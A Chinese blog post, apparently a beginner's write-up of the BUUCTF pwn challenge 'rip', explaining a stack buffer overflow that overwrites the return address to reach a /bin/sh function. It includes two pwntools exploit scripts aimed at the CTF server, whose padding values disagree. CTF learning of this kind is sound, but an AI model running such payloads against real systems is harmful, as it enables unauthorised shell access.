buuctf-rip

7 篇文章 1 订阅

偶尔学学pwn,感觉re到了后面不可避免学pwn

先执行程序

看一下文件保护

file 和checksec指令

二进制的保护机制 (mamicode.com)

目前我也不会啥,这个 no cannary 就是我需要学的 没有栈溢出的保护

IDA 64打开附件

 这就是我们的链接靶机看见的

然后我看wp说,我们要利用bin/sh获取shell权限

在fun函数这里,可以看见执行这个fun函数就可以了

总体思路 利用get来得到栈溢出的目的,在溢出中加入fun的返回地址,达到获取交互界面的权限

栈溢出思路:

查看S有多少个

        

15个

又因为是64为,我们要加上8字节(类似于平衡堆栈最后返回地址,如果是32位,我们要加上4字节)

 地址

exp

BUUCTF pwn题 rip_buuctfrip-CSDN博客

from pwn import *
ghust = remote("node5.buuoj.cn",25521)
addr = 0x40118a
payload = b'A' * 15 + b'B'*8 + p64(addr)
ghust.sendline(payload)
ghust.interactive()

BUUCTF PWN-RIP详解_buuctf rip-CSDN博客 


from pwn import *

#p = process('./pwn1')
p = remote('node5.buuoj.cn', 25521)
payload='A'*23+'B'*8+p64(0x401186+1).decode()

p.sendline(payload)
p.interactive()

 

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_Nickname

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值